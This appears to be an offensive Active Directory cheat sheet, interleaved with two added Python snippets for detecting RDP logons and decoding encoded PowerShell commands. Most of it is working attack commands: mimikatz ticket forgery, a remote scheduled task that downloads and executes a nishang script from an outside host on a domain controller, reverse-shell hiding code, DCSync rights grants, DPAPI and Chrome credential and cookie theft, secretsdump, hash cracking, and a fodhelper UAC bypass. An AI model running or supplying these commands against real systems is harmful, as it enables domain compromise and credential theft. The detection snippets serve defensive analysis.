Create and inject a silver ticket using mimikatz kerberos::golden. Confirm ticket using klist.
PS C:\Tools> .\mimikatz.exe "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXX /target:dt-dc.domain.local /service:HOST /rc4:FB18AD18D520EA42025E3F676D325F23 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
Create a scheduled task that downloads and executes nishang (the quotes are tricky).
PS C:\Tools> schtasks /create /S dt-dc.domain.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "priv4" /TR "powershell.exe -c 'iex(new-object net.webclient).downloadstring(''http://10.10.10.10/9001.ps1''')'"
Run the scheduled task.
PS C:\Tools> schtasks /Run /S dt-dc.nuclear.site /TN "priv4"
Reverse shells: https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
Compile with Visual Studio, or from the C# command line:
PS C:\Tools> csc -out:rev.exe Program.cs
#include <windows.h>

// Hides the console window of the current process (pair with the reverse shell above)
void Stealth()
{
    HWND Stealth;
    AllocConsole();
    Stealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(Stealth, 0);   // 0 = SW_HIDE
}
https://github.com/OlivierLaflamme/Cheatsheet-God
-k keep listening, -w reduce timeout
# netcat -nvlp 1234 -k -w 1
# crackmapexec smb -u user -p password -x "powershell BEACON OR GRUNT HERE"
PowerView_dev.ps1
Add-ObjectACL -PrincipalIdentity domain\user -Rights DCSync -Verbose
C:\> $encrypted = Get-Content .\Encrypted.txt
C:\> $d1 = ConvertTo-SecureString $encrypted -Key (iex(Get-Content .\key.txt))
C:\> $bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($d1)
C:\> $password = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($bstr)
C:\> $password
SharpDPAPI.exe backupkey [/server:SERVER.domain] [/file:key.pvk]
or
lsadump::backupkeys /system:<DOMAIN CONTROLLER> /export
with DA, then
dpapi::chrome /in:"Login Data|Cookies" [/unprotect | /masterkey:SHA1]
or
SharpDPAPI.exe triage /server:HOST /pvk:BASE64
SharpChrome logins /server:HOST /pvk:BASE64
SharpChrome cookies /server:HOST /pvk:BASE64
Finding RDP Regex:
Event ID: 4624
Text in description:
Logon Type:[\t\s]*10[\r\n\s]*|Logon Type:[\t\s]*12[\r\n\s]
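As an added example (not from the original cheat sheet), the regex above applied to 4624 events in Python, together with a parser that pulls the account and source address out of the "New Logon" section of the description; the event descriptions are constructed sample data in the tab/CRLF layout the Security log renders, not real log entries. Note that 4624 carries "Account Name" twice (once under Subject, once under New Logon), so the parser only reads the text after "New Logon:".

```python
import re
from typing import Dict, List, Optional

# Regex from the cheat sheet: Logon Type 10 = RemoteInteractive (RDP),
# 12 = CachedRemoteInteractive (RDP with cached credentials).
RDP_LOGON_RE = re.compile(r"Logon Type:[\t\s]*10[\r\n\s]*|Logon Type:[\t\s]*12[\r\n\s]")


def _render_4624(logon_type: int, account: str, domain: str, source: str) -> str:
    """Build a constructed 4624 description in the tab/CRLF layout the Security
    log uses. Sample data only; not taken from a real system."""
    return (
        "An account was successfully logged on.\r\n\r\n"
        "Subject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n"
        "\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\r\n"
        f"Logon Type:\t\t\t{logon_type}\r\n\r\n"
        "New Logon:\r\n\tSecurity ID:\t\tS-1-5-21-0000000000-0000000000-0000000000-1001\r\n"
        f"\tAccount Name:\t\t{account}\r\n\tAccount Domain:\t\t{domain}\r\n\r\n"
        "Network Information:\r\n\tWorkstation Name:\tWS01\r\n"
        f"\tSource Network Address:\t{source}\r\n\tSource Port:\t\t50000\r\n"
    )


# Constructed events: only the two RDP logons (alice, bob) should be reported.
# The 4625 reuses the same description shape for simplicity; it is filtered by ID.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Description": _render_4624(2, "svc_backup", "EXAMPLE", "-")},
    {"EventID": 4624, "Description": _render_4624(10, "alice", "EXAMPLE", "10.10.10.42")},
    {"EventID": 4625, "Description": _render_4624(10, "bob", "EXAMPLE", "10.10.10.43")},
    {"EventID": 4624, "Description": _render_4624(12, "bob", "EXAMPLE", "10.10.10.44")},
    {"EventID": 4624, "Description": _render_4624(3, "carol", "EXAMPLE", "10.10.10.45")},
]


def is_rdp_logon(event: Dict) -> bool:
    """The cheat sheet's test: a 4624 whose description matches the regex."""
    return event["EventID"] == 4624 and RDP_LOGON_RE.search(event["Description"]) is not None


def parse_4624(event: Dict) -> Dict:
    """Pull the fields an analyst wants from the 'New Logon' section."""
    desc = event["Description"]
    m = re.search(r"Logon Type:\s*(\d+)", desc)
    new_logon = desc.split("New Logon:", 1)[-1]

    def field(name: str) -> Optional[str]:
        fm = re.search(re.escape(name) + r":\s*([^\r\n]+)", new_logon)
        return fm.group(1).strip() if fm else None

    return {
        "logon_type": int(m.group(1)) if m else None,
        "account": field("Account Name"),
        "domain": field("Account Domain"),
        "source": field("Source Network Address"),
    }


def find_rdp_logons(events: List[Dict]) -> List[Dict]:
    """Parsed RDP logons, in log order."""
    return [parse_4624(e) for e in events if is_rdp_logon(e)]


if __name__ == "__main__":
    for hit in find_rdp_logons(SAMPLE_EVENTS):
        print(hit)
```

On a real export (for example the Message field of Get-WinEvent objects), build the event dicts from EventID and Message; the regex deliberately does not anchor at a line end for type 10, so it relies on there being no other logon type starting with "10".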
python secretsdump.py DOMAIN.COM/adminuser:[email protected] -user-status -pwd-last-set -outputfile DC01
Cracking NTLM or NTDS.dit
hashcat.exe -a 0 -m 1000 hashes.txt wordlist.txt -r rule.rule --username -w 2 -O -o outfile.txt
Display potfile
hashcat.exe -a 0 -m 1000 hashes.txt --show --username
Use https://www.base64encode.org/
Must be encoded with UTF-16LE
powershell.exe -encoded base64utf-16le...
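As an added example (not part of the original cheat sheet), the UTF-16LE requirement from this section and the -EncodedCommand construction shown earlier, written in Python from the analyst's side: an encoder that matches what PowerShell expects, a decoder that recovers the script from an -EncodedCommand argument found in a process-creation log (Sysmon event 1 or Security event 4688), and a check that flags the common UTF-8 mistake. The sample command line is constructed, reusing the cheat sheet's own example payload as input.

```python
import base64
import re
from typing import List, Optional

# The cheat sheet's example payload, used here only as sample input.
PAYLOAD = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.10.10/nishang.ps1")'


def encode_powershell_command(command: str) -> str:
    """What -EncodedCommand expects: base64 of the UTF-16LE bytes."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def encode_as_utf8_base64(command: str) -> str:
    """The common mistake: base64 of UTF-8 bytes. PowerShell rejects this."""
    return base64.b64encode(command.encode("utf-8")).decode("ascii")


def looks_like_utf16le(raw: bytes) -> bool:
    """Heuristic: ASCII text in UTF-16LE has a 0x00 in every odd position."""
    return len(raw) >= 2 and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2])


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode an -EncodedCommand argument; None if it is not valid base64 of
    UTF-16LE text (for example the UTF-8 mistake above)."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    if not looks_like_utf16le(raw):
        return None
    return raw.decode("utf-16-le")


# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# -ex (ExecutionPolicy) must not match, hence the restricted suffix.
ENC_FLAG_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def extract_encoded_commands(command_line: str) -> List[str]:
    """Decode every -EncodedCommand argument found in a logged command line."""
    found = []
    for m in ENC_FLAG_RE.finditer(command_line):
        decoded = decode_encoded_command(m.group(1))
        if decoded is not None:
            found.append(decoded)
    return found


# Constructed process-creation command line; not from a real log.
SAMPLE_COMMAND_LINE = "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_powershell_command(PAYLOAD)

if __name__ == "__main__":
    for cmd in extract_encoded_commands(SAMPLE_COMMAND_LINE):
        print(cmd)
```

The odd-byte check is only a heuristic for ASCII scripts; a script containing non-ASCII characters would need a looser test, but it is enough to tell a correctly encoded argument from one that was base64'd as UTF-8 by a web tool.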
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" foo.txt
https://sid-500.com/2019/07/30/powershell-retrieve-list-of-domain-computers-by-operating-system/
Get-ADComputer -Filter 'enabled -eq "true"' `
-Properties Name,Operatingsystem,OperatingSystemVersion,IPv4Address |
Sort-Object -Property Operatingsystem |
Select-Object -Property Name,Operatingsystem,OperatingSystemVersion,IPv4Address
MATCH (H:Computer) WHERE H.operatingsystem =~ '(?i).*(2000|2003|2008|xp|vista|me).*' RETURN H
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
cmd -> fodhelper
DomainA --direction of access--> DomainB
DomainA <--direction of trust-- DomainB
"If you trust me, you can access resources from me"
rdesktop -d dt.com -u user1 -p Pa$$w0rd 10.10.10.10 -g 100%
xfreerdp +clipboard /d:test.com /u:test /p:Pa$$w0rd /v:10.10.10.10 /size:100%
xfreerdp +nego +sec-rdp +sec-tls +sec-nla /d: /u: /p: /v:10.10.10.10 /u:administrator /p:password /size:100%
smbclient //x.x.x.x/c$ -W domain.com -U admin%nthash --pw-nt-hash
https://gist.github.com/seajaysec/c7f0995b5a6a2d30515accde8513f77d